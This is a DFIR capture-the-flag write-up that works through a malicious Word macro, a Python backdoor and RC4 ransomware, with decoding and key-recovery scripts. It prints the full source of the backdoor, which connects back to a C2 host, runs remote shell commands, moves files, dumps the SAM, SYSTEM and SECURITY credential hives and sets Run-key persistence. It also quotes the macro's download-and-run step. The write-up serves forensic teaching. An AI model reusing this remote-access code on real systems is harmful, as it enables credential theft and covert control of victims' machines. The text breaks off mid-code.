# The Malware Crusade
>Medium on DFIR labs
>Description
>I downloaded a phishy word document from my mail, little did I know it was gonna bite me back. Right after I downloaded the file my computer went haywire and all my files were encrypted. There is an important file among it. Can you figure out what all happened and also recover my files back?
`File Password : L1>l:p7!7h4[D23^iZ&)`
>Questions
```
Q1) What is the value of the registry entry that was stored by the macro?
Q2) What is the first command that was sent to C2 victim from the C2 server?
Q3) What is the key used by the ransomware to encrypt the zip file? key used by the ransomware?
Q4) What is the md5 hash of the important document that he had compressed and stored {md5(file)}?
Q5) Can you find out where the user stores his secrets online?
Q6) The user noted down the password to unlock private secret storage and forgot to save it. Can you recover it?
Q7) What is inside the private secret storage ?
```
## Question 1
I used the oletools suite to extract the macros embedded in cv_001.dotm.

The macro contains the following procedures:
- Sub AutoOpen(): automatically runs DownloadAndOpenFile and RegistryEntry
- Sub Document_Open(): runs DownloadAndOpenFile and RegistryEntry when the document is opened
- Sub RegistryEntry(): creates a registry key, abusing WScript.Shell to write the registry entry
- Sub DownloadAndOpenFile(): downloads a file from a URL
  url = "https://filebin.net/d4oxliqap0dxa52y/client.py"
  destinationPath = Environ("TEMP") & "\msserver.py"
  and then runs it through WScript.Shell:
  python.exe & " " & ' & DestinationPath '
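A triage check over extracted macro text, added here as an example (it is not part of the original writeup and not oletools code): it looks for the indicators listed above (auto-execution entry points, WScript.Shell, registry writes, `Environ("TEMP")` drops, remote URLs, interpreter launches) and flags the document. The VBA sample inside is constructed to resemble the macro; the URL is the one quoted above, the registry path is a placeholder, and the download step is deliberately omitted.

```python
import re

# Rules for the macro behaviours identified in cv_001.dotm. Rule names are mine.
RULES = {
    "autoexec_entrypoint": re.compile(
        r"\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
    "registry_write": re.compile(r"\bRegWrite\b", re.I),
    "temp_drop": re.compile(r'Environ\s*\(\s*"TEMP"\s*\)', re.I),
    "remote_url": re.compile(r"https?://[^\s\"']+", re.I),
    "interpreter_launch": re.compile(
        r"\b(python|powershell|cmd|wscript|cscript|mshta)\.exe\b", re.I),
}

# Constructed VBA text modelled on the indicators above (not the real macro).
# The registry path is a placeholder; no download call is included.
SAMPLE_VBA = r'''
Sub AutoOpen()
    DownloadAndOpenFile
    RegistryEntry
End Sub

Sub Document_Open()
    DownloadAndOpenFile
    RegistryEntry
End Sub

Sub RegistryEntry()
    Set sh = CreateObject("WScript.Shell")
    sh.RegWrite "HKCU\Software\PLACEHOLDER_KEY\keyValue", "fA3bDt", "REG_SZ"
End Sub

Sub DownloadAndOpenFile()
    url = "https://filebin.net/d4oxliqap0dxa52y/client.py"
    destinationPath = Environ("TEMP") & "\msserver.py"
    Set sh = CreateObject("WScript.Shell")
    sh.Run "python.exe " & destinationPath
End Sub
'''

# A benign macro for comparison (constructed).
BENIGN_VBA = '''
Sub BoldHeadings()
    Selection.Font.Bold = True
End Sub
'''


def triage_macro(vba_text):
    """Return the rules that fired, the auto-exec procedure names and any URLs."""
    indicators = [name for name, rx in RULES.items() if rx.search(vba_text)]
    return {
        "indicators": indicators,
        "autoexec": RULES["autoexec_entrypoint"].findall(vba_text),
        "urls": RULES["remote_url"].findall(vba_text),
    }


def is_suspicious(vba_text):
    """Auto-execution combined with any execution, download or persistence indicator."""
    r = triage_macro(vba_text)
    risky = {"wscript_shell", "registry_write", "temp_drop",
             "remote_url", "interpreter_launch"}
    return bool(r["autoexec"]) and bool(risky.intersection(r["indicators"]))


if __name__ == "__main__":
    for label, text in (("cv_001.dotm-like", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, triage_macro(text), "suspicious:", is_suspicious(text))
```

In practice the input is the text that `olevba cv_001.dotm` prints; feeding that to `triage_macro` gives the URL and the entry points to pivot on before reading the whole macro.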
### Answer 1 : keyValue = "fA3bDt"
Checking and retrieving the file at C:\Users\challenge\AppData\Local\Temp\msserver.py:

```python
import json
import os
import shutil
import socket
import subprocess
import sys
import time
from sys import platform
import requests
import base64


# Every message is a JSON value written straight to the socket
def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())


def reliable_recv():
    data = ""
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue


# Receive a file from the C2 server ("upload" command)
def download_file(file_name):
    f = open(file_name, "wb")
    s.settimeout(2)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()


# Send a local file to the C2 server ("download" command)
def upload_file(file_name):
    f = open(file_name, "rb")
    s.send(f.read())
    f.close()


def download_url(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


def get_sam_dump():
    if not is_admin():
        return "You must run this function as an Administrator."
    SAM = r"C:\\Windows\\System32\\config\\SAM"
    SYSTEM = r"C:\\Windows\\System32\\config\\SYSTEM"
    SECURITY = r"C:\\Windows\\System32\\config\\SECURITY"
    try:
        sam_file = open(SAM, "rb")
        system_file = open(SYSTEM, "rb")
        security_file = open(SECURITY, "rb")
        sam_data = sam_file.read()
        system_data = system_file.read()
        security_data = security_file.read()
        sam_file.close()
        system_file.close()
        security_file.close()
        return sam_data, system_data, security_data
    except PermissionError:
        return "Insufficient permissions to access SAM, SYSTEM, or SECURITY files."
    except FileNotFoundError:
        return "SAM, SYSTEM, or SECURITY file not found. Please check the file paths."
    except Exception as e:
        return f"An unexpected error occurred: {str(e)}"


# Copy itself to %APPDATA% and register a Run key
def persist(reg_name, copy_name):
    file_location = os.environ["appdata"] + "\\" + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call(
                "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "
                + reg_name
                + ' /t REG_SZ /d "'
                + file_location
                + '"',
                shell=True,
            )
            reliable_send("[+] Created Persistence With Reg Key: " + reg_name)
        else:
            reliable_send("[+] Persistence Already Exists")
    except:
        reliable_send("[-] Error Creating Persistence With The Target Machine")


def startup_persist(file_name):
    pass


# Privilege check: tries to list %SystemRoot%\temp
def is_admin():
    global admin
    if platform == "win32":
        try:
            temp = os.listdir(
                os.sep.join([os.environ.get("SystemRoot", "C:\\windows"), "temp"])
            )
        except:
            admin = "[!!] User Privileges!"
        else:
            admin = "[+] Administrator Privileges!"
    elif platform == "linux" or platform == "linux2" or platform == "darwin":
        pass


# Traffic "encryption": XOR each byte with its index, then base64 (flag=1 encodes, flag=0 decodes)
def highly_secure_payload(data, flag):
    if flag:
        data = bytearray(data.encode())
        for i in range(len(data)):
            data[i] = data[i] ^ i
        data = base64.b64encode(data).decode()
    else:
        data = bytearray(base64.b64decode(data))
        for i in range(len(data)):
            data[i] = data[i] ^ i
        data = data.decode()
    return data


# Command dispatcher
def shell():
    while True:
        command = reliable_recv()
        command = highly_secure_payload(command, 0)
        if command == "quit":
            break
        elif command == "background" or command == "bg":
            pass
        elif command == "help":
            pass
        elif command == "clear":
            pass
        elif command[:3] == "cd ":
            os.chdir(command[3:])
        elif command[:6] == "upload":
            download_file(command[7:])
        elif command[:8] == "download":
            upload_file(command[9:])
        elif command[:3] == "get":
            try:
                download_url(command[4:])
                reliable_send("[+] Downloaded File From Specified URL!")
            except:
                reliable_send("[!!] Download Failed!")
        elif command[:11] == "persistence":
            reg_name, copy_name = command[12:].split(" ")
            persist(reg_name, copy_name)
        elif command[:7] == "sendall":
            subprocess.Popen(
                command[8:],
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
            )
        elif command[:5] == "check":
            try:
                is_admin()
                reliable_send(admin + " platform: " + platform)
            except:
                reliable_send("Cannot Perform Privilege Check! Platform: " + platform)
        elif command[:5] == "start":
            try:
                subprocess.Popen(command[6:], shell=True)
                reliable_send("[+] Started!")
            except:
                reliable_send("[-] Failed to start!")
        elif command[:12] == "get_sam_dump":
            sam_dump, system_dump, security_dump = get_sam_dump()
            reliable_send((sam_dump, system_dump, security_dump))
        else:
            # Anything else is run through the shell; output is encoded before sending
            execute = subprocess.Popen(
                command,
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
            )
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            result = highly_secure_payload(result, 1)
            reliable_send(result)


# Connect back to the C2 server, retrying forever
def connection():
    while True:
        time.sleep(1)
        try:
            s.connect(("192.168.56.1", 5555))
            shell()
            s.close()
            break
        except:
            connection()


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
```
Script summary:
- connection(): opens the C2 socket and reconnects on failure
- reliable_send(data): sends data as JSON
- reliable_recv(): receives data and deserializes the JSON
- download_file(file_name): receives a file from the C2 server and writes it to disk
- upload_file(file_name): sends a local file to the C2 server
- download_url(url): fetches a file from a URL
- get_sam_dump(): reads the credentials in the SAM, SYSTEM and SECURITY hives
- highly_secure_payload(data, flag): with the flag set, XORs each byte with its index and base64-encodes the result; without the flag, base64-decodes and reverses the XOR
- persist(reg_name, copy_name): adds the file to CurrentVersion\Run
- is_admin(): checks for administrator privileges
- shell(): command handler

Based on the script, filter the capture in Wireshark with ip.addr == 192.168.56.1 && tcp.port == 5555.


The decryption script, decrypt.py:
```python
import base64
enc = ["d2ltYmls", "Y2ljb2hZZW9pZWZuYmprAho=", "ZWJqbCRpT2RYQE1MVG54", "bEhhU01CQV9rfwcB", "ZWJqbCRkUTZ/azlBPERGRXhzf0Fid0Vgf3spVm9UVlEReExhXUcUaURKGWZfZGZhAFJfX0FvT0BfXQhXSV5TaS4CJX55ZXh5aC8jJyljOjck", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQEJBYFRZXXZyf0V6dE5ZKHp0d3p5c1lTRXV2S0QUcR1laWlWSXllQmtqWEd8fm1QW3JtUGUMCigjFRY0CiEodWl0dWwrJyM1fyYrIA==", "ZWJqbCRMRUZvQEJZdWhaYFsxLC00c397fTduY2g=", "ZWJqbCRMRUZvQElKa0RNTWlLRXdkdiVFYXxMIm5HRnRHcXFhF0RxElFzfUhZeR1tXFNZR1hQZV9KY2JQT3R2cXEYLzcoIBUsA2l0dWwrJyM1fyYrIA==", "ZWJqbCRMRUZvQElKa0RNTSJIRWslT0Vgf0FjWiVUVntQQ0xpSH9fEnpNfX1VSHh1WFN6ZVhnblBXWldtUlxmcXAiLC8iJHQRfQUJCX4UGTdhCwRqIQwBZjQSCzRhfWBhQAcLDwFLEh8c", "ZWJqbCRMRUZvQElKa0RNTSNwRSZtT0F0bUgoY2p+LElse3pIS0ZLcUZIcmUcTkBDVlAAZQF+Z1gFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTWlLSkEldnsjf313XW95SUprARwdBENPS00HXlNY", "ZWJqbCRMRUZvQE1dOFQ8WWd1VnxfNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQElKa0RNTWdISl1uVnEqJTkkJTx7d3NFD1ZbUA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkNFE9QE47a2k8Y2Vyf0V6WX1/VEtMd3pML0lzdEl1a3NgHn58Gn1/bkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRmNVFhaDhdOURKP3dye1lAdyRNKH0oXWVHSGd2Q09PUUYVdUBLbVxFbkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRha0F7bV1dam9jSWRLQVItXFVdWnpSWW98SVFIRWVPUkdPbmMJFBUMS0dDVR9GS0A=", "ZWJqbCRha0F7bV1ea11dTWlLRVV/TSVddEMod2Z5VlUVeRF5TEducURibV9ASH1YV1IBZV1UBGENdXl5DmRpR3EbFHoxHBF2JAIbJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkNFE9QE47a2ljSWN1RUZfNSgpOH9zd3kzamdU", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5+QE47a0ZPYC0xLC00c397fTduY2g=", "ZWJqbCRMRUZvQEx/fERJVWZye1FkXFF7bVBSVSx+c3NVe1sWTEYUaVhIfBJfTx1LXFJffVxWBGFcel0GAR0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQEl4a1o8ZHdLfyptXFF8f3hNL3t+LU1ZQHUWSmlLYVJwGEdcdR15R1J1ZU1sBHFCY2wLdx0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQEl4a1o8ZHdLfyptXFF8f3hNL3t+LU1ZQHUWSmlLdVhzGEccTh8fexEMDRRTX1tdF05DSA==", "ZWJqbCROV2g1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5xQE1ga2xZO3dyf1VhTyRCd1dZcCpeeSIdARwdBENPS00HXlNY", 
"ZWJqbCRMRUZvQE1/YGhdTmJBQVFtTEEic3soK2lELHdWQHVtSG5hfV5LU0BnDRAREFdbX1EbQk9M", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1/YGhYQXpwVUJ7dCRBLVJOdFc9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQEJFZmxJWXtYViNzQiR8f0N3ImVUWXRHQHUXQ0ZLYV1zGH5DYG1YV3xYZgZ+YAdzGQQFHFtXUyVvNjsw", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQE1ga11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQE1Rem5nTWFYVX9hXF5dcHt3f3BWWl5TaGZqFWtPTB5qTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWBYViNzXlF8f1JjWWZELHdMe2RXVX11ZlpgbV9ASHhbQXhxZlNXcWFNcn1PUFhtUyQKEQIoDAIOeQctJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSBzSlJzRUVVYkAoc3BHWGtReXNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaUFJWiVUVlFKQGV1T3IUS0xqTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaEFJWiVUVk1UQmNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJBYGlGWWlze1FuTCR/dENbdCE9ICEAR0tPQQtSX1w=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1vYG9iQSByf0V8d0V/YkAoc3BHXXQWYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1ga11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQE1ka11dTmdSdS4pNSgpOH9zd3kzamdU", "ZWJqbCRMRUZvQEJvY2xZd3xYVEFtcUFCLlp9JiE9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQElKa0RNTWBYViNzXlJSf1JjWWxWTV5MaGZqFWtBSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQElKa0RNTWFYViNzXl5ZcnhdTXdKLHNEaGFQQ0RPTE9jeWpVY3p2exEMDRRTX1tdF05DSA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSBzSlJzRUVVYkAoc3BHWGtReXNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaUFJWiVUVlFKQGV1T3IUS0xqTRYRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWpIIHt4T1BjaEFJWiVUVk1UQmNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQElKa0RNTSVwRUVnT1VVYkAoc3BHWGxPQhBtS39xdUpIfBtLZldtSmgAW1hvcENJYWlQW3dtfjkPFhkgBiF6dWl0dWwrJyM1fyYrIA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfQVFlQE1deVQ9RSVyWkJ7cVFBLH1ZbHt8LEkVanZMbwUYGQhPQ0dJA1pXRA==", 
"ZWJqbCRMRUZvQE1nYURJY2pwRSZucVFRbUAoTnN5WUkURWFUQ0YVdVFifkRnDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTSBLSnskXFInf31dTSh5XSpMQ09tUn9hckdgRH0cd0cfBHhbWH8VCAkYX1NXWRNKRzQ=", "ZWJqbCRMRUZvQE1nYURJY2pwRSZucVFRbUAoTnN8LEkVbWFhXkFublhmTUQRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQElKa0RNTWJLSnhzRUVVakNCcGlHSSpKQxBxSG5lbRlNbXJYYm1mQHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJFZmxJWXtYViNzdCRBLUwoVXNHXXdSe3pIVGZBGhUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1/YGhYNmp1Wll4TEEnf0lJWXJHSSp0RWppSHxxF0dKGGVDd3l+QHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQE1FfG5JZ3xyfEF4cF5Gf0lJWXV4Rk1MeHppXXx+TEdie0QRDRAREFdbX1EbQk9M", "ZWJqbCRMRUZvQE1Rem5nTXpwVVVtXFF7bVBSSXB4Vk4WYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQElKa0RNTXxzf15zRUVVcnhdXWVUWCtHQ091EEFlT1pzckdKTh19SWtldUB+Z1gFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTXpwSlF7T05dKENCcyxRc1lXQmV1UX9lT0RLR2ZcbkkSDREMDRRTX1tdF05DSA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRMRUZvQEJBYGlGWWlze1F9cE5FdHpjc3Z8Rl1Pe3ppFH9+Txhie0QRDRAREFdbX1EbQk9M", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRkQT58U1lKNURGQSFIfFFtdyRZdHopVmlHLEkQQxF1FEZucRhiaWFAdBxHRnhxZQVWBGFBWnJxSmdTUzMbERYtDhcodWl0dWwrJyM1fyYrIA==", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfa2t7U1xJZGlJZ2pYViNzQmF4JTkkJTx7d3NFD1ZbUA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXUNCVW55WSZXaEtUbwUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXXsoVS1/SUlVRWpuTWlnSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvXXspf2l/WSZIe2puTWlnSBUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvVn1CVWxEZ1ZTYkUeGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvSXhNVSx5RlVMQltqV2ZBGhUJFBUMS0dDVR9GS0A=", "ZWJqbCRMRUZvQE1jem9ZWndaa1J9TVBvT3hNSXB/LVJJbWNMGQUYGQhPQ0dJA1pXRA==", "ZWJqbCRdV2g1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRGYTo1KTQ1LGtnY3U/Zmtg", "ZWJqbCRfaz5xQEJJZGlJaHdwRSdzT3t7a0NMWXR5WXdabkVMGQUYGQhPQ0dJA1pXRA==", 
"ZWJqbCRMRUZvQE1Rem5nTWlzICokWVVVc3hCUWZRXV1NQHVbSEZfZVhLQ2laTlcaA2hlS0Z+fnVQXX1cTHJZUH1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTWdISkF7XFInf3p3Imp5XSpaQmVbVEFlT15KUx5Wd3ZuQHJVDgkVCAkYX1NXWRNKRzQ=", "ZWJqbCRMRUZvQElKa0RNTX1zIVpzdlFvcHhNLlt8SWdMaGVPUWxhfVhLbX1WYklADREMDRRTX1tdF05DSA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzdEFOf1JbdCE9ICEAR0tPQQtSX1w=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWW9ESXNVc09PV391ZkB5eWpFd2l5SlABYUJWdQJIW1dQVX5ZAn1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdXWlHXV1XQ2VlVEdNfVhLbX5LZHofV3hfdkFWflxRel0GAR0AAWAnKy8hazI/PA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdXWlHXV1XQ2VlVEdNfVhLbX5LZHofV3hffQZtTHZPdGkOV18NbTQIJSx5ZXh5aC8jJyljOjck", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXkJ4UzkkJTx7d3NFD1ZbUA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWW9ESXNVc09PV391ZhFgYmFaTx1+V3pLcl1tcEBRcHlIW155RyggFXYDJBE/JAotdnFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWWV8SSoQamphV3xxS117R0dfd31EexEMDRRTX1tdF05DSA==", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSf2x5WXhHQxFhSEdPT19LbW1cT0V1QFN1Zkd8dX1BYFNyTHR5eToIBRk0JwESfgotdnFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BZWntUXV1XQ2VlVEdIdURMYnpLfX1tXVBlS1h5WH1UYG1qU3ZvUH1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdVWx+WXdMQk5xSEBudk95eWlAT0NhSVRqcQR+fnVLYG1XSVl5aXQlATQjJHQRfQIbJHFtcHFwNzs/MXsiLyw=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BdImZRcFVMQ3UaFn91T19LbW1cT0V1QFN1ZkR2UQoFGQQFHFtXUyVvNjsw", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSf2x5WXhHQxFhSEdPT19LbW1cT0V1QFN1ZlN+T3ZRdVdtSWRHdjMIAQl3HC8OOAANDTYECRUgMxUGYhYxamV5ZGV8OzczBU8WGxA=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BZWntUXV1NQHVbSGlIQ1FIcnlAZmlhQFJ1W1hWWmVUXHJqTH5ZAn1hfH1kIy8rLWc+Mzg=", "ZWJqbCRMRUZvQElKa0RNTndYUVJzXFVWf1BSWWV8SSoQamFIbwUYGQhPQ0dJA1pXRA==", "cHh2a2trJiprKShiYX1hfWQxcHJncCAjIzl1a3lzNjhBD1JaAwkGAF9LDQICWlxGRFReWlpQRR9aWEleCgkQXXZ1JiYnKiIiYCUjJSljKyEzPjY2fHx/d3N5OHwAM3l/Bg4QQwgMCAJIAARLAx0LAVhWFBoYEFgDAA1dV1xaDFipqKA=", "cHh2a2trJmYmeXMrKisua3V9MnI6ZW8=", 
"QzteVndgdHRUamJqYGFrYXd0TldxZn1jd2lGVnV+bHBTTkRXBGBCQE0HRkVHICQiOnIIb2FGU0VLZVlTXVFSWi4mJx8AKiUyJSwkPz8RJyIgPiAnNTsieSIwKlZWUFQcWj03EAEXFTsLAQsHAAgACBUtNhwDGxoYGR0JJxoUEhqu9fr3iY+LjQ==", "ZWJqbCRhaWltKQ==", "ZG5sZiQIDA=="]
def decrypt(data):
    # Reverse highly_secure_payload(data, 1): base64-decode, then XOR each byte with its index
    data = bytearray(base64.b64decode(data))
    for i in range(len(data)):
        data[i] ^= i
    return data.decode()


for payload in enc:
    dec = decrypt(payload)
    print(dec)
```
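The script above works on base64 strings already pulled out of the capture by hand. Added here as an example (not part of the original writeup and not the malware's code) is a decoder that starts one step earlier, from a reassembled TCP stream: because `reliable_send` writes one JSON value per send with no delimiter, a "Follow TCP Stream" export is a concatenation of JSON values, which `raw_decode` peels off one at a time before the base64/XOR transform is undone. The server-side sample starts with the real `"d2ltYmls"` frame from the capture; every other frame and the hostname are constructed.

```python
import base64
import binascii
import json


def xor_index(data: bytes) -> bytes:
    """The client's highly_secure_payload transform: byte i XOR i, its own inverse.
    Masked to a byte so it stays defined for long frames; identical to the client
    for frames under 256 bytes, which covers everything in the capture."""
    return bytes((b ^ i) & 0xFF for i, b in enumerate(data))


def encode_frame(text: str) -> str:
    """What reliable_send puts on the wire for an encoded string."""
    return json.dumps(base64.b64encode(xor_index(text.encode())).decode())


def split_json_frames(stream: str):
    """Split a concatenation of JSON values (one per reliable_send) into objects."""
    dec = json.JSONDecoder()
    idx, frames = 0, []
    while idx < len(stream):
        if stream[idx].isspace():
            idx += 1
            continue
        obj, idx = dec.raw_decode(stream, idx)
        frames.append(obj)
    return frames


def decode_frame(obj):
    """Undo highly_secure_payload(data, 1). Status messages such as "[+] Started!"
    are sent unencoded by the client, so anything that is not valid base64 is
    returned unchanged; non-string frames (the get_sam_dump tuple) pass through."""
    if not isinstance(obj, str):
        return obj
    try:
        raw = base64.b64decode(obj, validate=True)
    except (binascii.Error, ValueError):
        return obj
    return xor_index(raw).decode("utf-8", "replace")


def decode_stream(stream: str):
    """Decode every frame of one direction of a reassembled TCP stream."""
    return [decode_frame(f) for f in split_json_frames(stream)]


# Constructed streams. The first server frame is the real "d2ltYmls" from the
# capture; the rest is made up for illustration.
SAMPLE_SERVER_STREAM = '"d2ltYmls"' + encode_frame("cd C:\\Users")
SAMPLE_CLIENT_STREAM = (
    encode_frame("DESKTOP-EXAMPLE\\victim\r\n")  # constructed whoami output
    + json.dumps("[+] Started!")                 # unencoded status message
)

if __name__ == "__main__":
    for direction, stream in (("server->client", SAMPLE_SERVER_STREAM),
                              ("client->server", SAMPLE_CLIENT_STREAM)):
        for frame in decode_stream(stream):
            print(direction, repr(frame))
```

Run it against the raw bytes of each direction of the 192.168.56.1:5555 stream (server to client gives the operator's commands, client to server the responses); the first decoded server frame is `whoami`.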

### Answer 2 : whoami
## Question 3
I saved the script as a.py and read its source.
a.py is a ransomware script that uses RC4 to encrypt files.
The key is split into two parts:
base key | 4 random characters
We already have the base key from Question 1.
So we write a script that brute-forces the decryption of important.zip.enc: whichever candidate key yields the zip header b"PK\x03\x04" after decryption is the key.
```python
import itertools
import string

# Encrypted data: the leading bytes of important.zip.enc
enc_data = b'\x92wC)\xdb\xf7\x9f<\x034V\xcd\xfb\x12\x99*\xd2\x81\x02j6\x91Ihb\xeb\xef1\x88\xa5'
# Base key recovered from the macro in Question 1
base_key = "fA3bDt"


# RC4 key schedule, keystream generator and decryption
def keySchd(key):
    sched = list(range(256))
    i = 0
    for j in range(256):
        i = (i + sched[j] + key[j % len(key)]) % 256
        sched[j], sched[i] = sched[i], sched[j]
    return sched


def genStream(sched):
    i = j = 0
    while True:
        i = (i + 1) % 256
        j = (sched[i] + j) % 256
        sched[i], sched[j] = sched[j], sched[i]
        yield sched[(sched[i] + sched[j]) % 256]


def rc4_decrypt(data, key):
    sched = keySchd(key)
    stream = genStream(sched)
    return bytes([b ^ next(stream) for b in data])


# Charset for the last 4 characters
charset = string.ascii_letters + string.digits

# Brute-force: only the first 8 bytes are decrypted per candidate, enough to check the zip header
for suffix in itertools.product(charset, repeat=4):
    full_key = (base_key + ''.join(suffix)).encode()
    decrypted = rc4_decrypt(enc_data[:8], full_key)
    if decrypted.startswith(b"PK\x03\x04"):
        print(f"[+] Found Key: {full_key.decode()}")
        full_decrypted = rc4_decrypt(enc_data, full_key)
        print(f"[+] Decrypted Data: {full_decrypted}")
        # Write the file out if wanted:
        with open("decrypted.zip", "wb") as f:
            f.write(full_decrypted)
        break
```

### Answer 3 : fA3bDtz8z7
## Question 4
After decryption, the important archive turns out to be password-protected.
The MD5 hash of important.zip:
### Answer 4 : 2b33ff2f343ac8e7b2158ca00be8f6b6
## Question 5
Inspecting the user's web browser we find BraveSoftware. Extract the History file from the folder path %AppData%\Local\BraveSoftware\User Data\Default\History
and open it with a database viewer.
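The History file is a SQLite database, so the same lookup can be scripted instead of clicked through in a viewer. The example below is added here (it is not part of the original writeup): it reproduces the `urls` table that Chromium-based browsers such as Brave use, fills it with constructed rows (the pastebin URL is the one recovered here, the rest is filler), and lists visits newest first with the WebKit timestamps (microseconds since 1601-01-01 UTC) converted to readable dates. `open_history_readonly` is how you would open a copied real History file.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Chromium-based browsers (Brave included) store timestamps as microseconds
# since 1601-01-01 UTC (the WebKit epoch), not Unix time.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


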